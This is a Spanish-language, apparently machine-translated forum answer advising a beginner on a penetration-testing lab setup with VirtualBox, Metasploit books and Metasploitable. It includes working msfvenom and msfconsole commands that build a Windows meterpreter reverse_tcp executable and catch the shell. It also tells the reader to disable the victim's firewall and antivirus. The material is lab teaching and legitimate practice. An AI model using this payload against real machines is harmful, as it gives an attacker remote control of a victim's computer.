Sí, pero en lugar de eso, use un software de virtualización como VirtualBox o VMware para instalar la máquina víctima o atacante (no desea que una máquina vulnerable esté conectada a Internet directamente).
Lea libros como Metasploit: The Penetration Tester's Guide , es un gran libro escrito por el desarrollador de Metasploit. Sin embargo, muchas funcionalidades de Metasploit han cambiado desde el lanzamiento del libro y no hay una versión actualizada del mismo.
Por lo tanto, recomendaría leer Pruebas de penetración: una introducción práctica a la piratería . Es relativamente nuevo y un buen libro.
La configuración de laboratorio
A medida que lea los libros, le guiarán sobre cómo configurar su propio laboratorio de pruebas. Con cada paso en los detalles.
El problema
El máximo de libros comienza con Windows XP, pero desafortunadamente, Microsoft ha finalizado su soporte para Windows XP. Por lo tanto, tendrás dificultades para encontrar la configuración de XP. Incluso si logras encontrar Windows XP, la vulnerabilidad enumerada en los libros será parcheada (a menos que estés usando un laboratorio de pruebas de lápiz en línea, veré esto más adelante). Luego dirás "¿De qué sirve leer este libro?" ", le enseñará los conceptos básicos de las siguientes cosas," Cómo explotar vulnerabilidades conocidas "y muchas otras formas de" Cómo puede comprometer un sistema ".
En los próximos capítulos que encontrará, explotarán algunas vulnerabilidades conocidas y obtendrán acceso al sistema e intentarán enseñarle algo sobre la post-explotación (es decir, qué hacer cuando haya comprometido un sistema). Hay un capítulo completo sobre "Explotación posterior", pero tendrá que usar algunos trucos de la Explotación posterior de vez en cuando.
Le resultará frustrante no poder hacer nada con respecto a una vulnerabilidad parcheada. A continuación, describiré un pequeño truco para comprometer una computadora, de modo que pueda disfrutar de algo de Post-Explotación hasta los próximos capítulos.
Solución:
Suponiendo que hayas logrado encontrar Windows XP y las cosas están parchadas y quieres disfrutar de algo posterior a la explotación.
Siga los siguientes pasos:
Open a terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip of your machine) LPORT=(port you want to connect back to) -f exe > filename.exe
Transfiera este archivo a la máquina víctima y deshabilite el cortafuegos de Windows y AV, ya que será detectado por cualquier AV (este no es un buen método para comprometer un sistema, sino para aprender algo sobre la Posoperación que puede usar). No abra el archivo, espere hasta que haya terminado con todos los pasos.
Vuelve a abrir una terminal y escribe
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST XXX.XXX.XX.X
set LPORT XXX
run
(no cierre este terminal, aquí obtendrá su sesión de meterpreter después de ejecutar el archivo en la máquina víctima)
Cuando haya terminado con todos los pasos anteriores, puede ir a la máquina víctima y ejecutar el archivo exe generado.
¡Hoollaa! obtendrás una sesión de meterpreter y ahora puedes disfrutar de algo posterior a la explotación
NOTA
1- Lea cómo configurar su laboratorio del libro con cuidado, de lo contrario, el archivo exe generado no funcionará.
2- Puedes obtener tu dirección IP escribiendo ifconfig (todas estas cosas se mencionan en la sección de configuración de laboratorio, así que revisa).
3- Asegúrese de haber ingresado el mismo valor de LHOST y LPORT en el lugar especificado.
También puede aprender de SecurityTube sobre Metasploit en la sección Megaprimer. Los videos se pueden ver gratis, pero pueden suscribirse a ellos y usted puede obtener acceso a su laboratorio en línea. Entonces no tendrá que pasar por todos los problemas descritos anteriormente. Es tu elección.
Espero que esto pueda ayudarte.
ACTUALIZAR
El archivo generado anteriormente funcionará solo para Windows. Pero también puedes usar la distribución de Linux vulnerable como metasploitable. Se trata de una distribución de Linux vulnerable especialmente diseñada y encontrará varios tutoriales y libros sobre cómo explotar metasploitable.